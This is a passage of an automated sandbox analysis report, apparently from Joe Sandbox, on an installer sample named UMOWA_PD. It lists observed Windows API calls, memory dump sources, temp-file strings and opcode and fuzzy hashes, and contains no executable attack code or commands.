                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                                    • MulDiv.KERNEL32(0008A2A9,00000064,0008A4AD), ref: 00402FE1
                                                                                    • wsprintfW.USER32 ref: 00402FF1
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                    • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                    • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                    • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                    APIs
                                                                                      • Part of subcall function 6FE212BB: GlobalAlloc.KERNELBASE(00000040,?,6FE212DB,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212C5
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE22743
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE22778
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: 0b0ea83a4a82acf7bab6de142d0f144e3fd931f44b898a219ea044c01a7c2854
                                                                                    • Instruction ID: bd1cacba86ced1bdfd28403bfa1b810bf95adaff297c42cc3024274c2a1303d4
                                                                                    • Opcode Fuzzy Hash: 0b0ea83a4a82acf7bab6de142d0f144e3fd931f44b898a219ea044c01a7c2854
                                                                                    • Instruction Fuzzy Hash: 8D31DE31519601DFEB168F68CA84C2A7FF7FB97314324422EF10183260FB7568669B62
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                    • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                    • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                    • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                    APIs
                                                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405F51
                                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: 4v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nscE8.tmp
                                                                                    • API String ID: 3248276644-361211508
                                                                                    • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                    • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                    • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                    • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE225C2
                                                                                      • Part of subcall function 6FE212CC: lstrcpynW.KERNEL32(00000000,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212DC
                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 6FE22548
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FE22563
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                    • String ID:
                                                                                    • API String ID: 4216380887-0
                                                                                    • Opcode ID: 4e9d26238b5c17f24414a4a131f04647cdafdb78fbd67f49db4c1c16453f0f74
                                                                                    • Instruction ID: 6b14e27d5b8da15d792f736a1e871f2cc26efe8c9c7d38d4fbb9eac919c3c5aa
                                                                                    • Opcode Fuzzy Hash: 4e9d26238b5c17f24414a4a131f04647cdafdb78fbd67f49db4c1c16453f0f74
                                                                                    • Instruction Fuzzy Hash: 0A4101B1058305DFE724DF68D980E267FF9FBA6314F208A1EF40686281FB34A545CB62
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3808545654-0
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FE222D8,?,00000808), ref: 6FE216D5
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FE222D8,?,00000808), ref: 6FE216DC
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FE222D8,?,00000808), ref: 6FE216F0
                                                                                    • GetProcAddress.KERNEL32(6FE222D8,00000000), ref: 6FE216F7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE21700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 1148316912-0
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                    • wsprintfW.USER32 ref: 00404DF7
                                                                                    • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseValuelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp
                                                                                    • API String ID: 2655323295-3127785682
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                    • CharNextW.USER32(00000000), ref: 00405EAE
                                                                                    • CharNextW.USER32(00000000), ref: 00405EC6
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nscE8.tmp, xrefs: 00405E9C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CharNext
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp
                                                                                    • API String ID: 3213498283-3127785682
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,76E63420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                    • GlobalFree.KERNEL32(004E4570), ref: 00403B7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$pEN
                                                                                    • API String ID: 1100898210-205275323
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3355392842
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE21171
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE211E3
                                                                                    • GlobalFree.KERNEL32 ref: 6FE2124A
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE2129B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE212B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 0040269A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp$C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll
                                                                                    • API String ID: 1659193697-2384673828
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,?), ref: 00403031
                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 00405549
                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                      • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                    • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0

                                                                                    Execution Graph

                                                                                    Execution Coverage:0%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:23.5%
                                                                                    Total number of Nodes:81
                                                                                    Total number of Limit Nodes:0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2 33cd34e0-33cd34ec LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
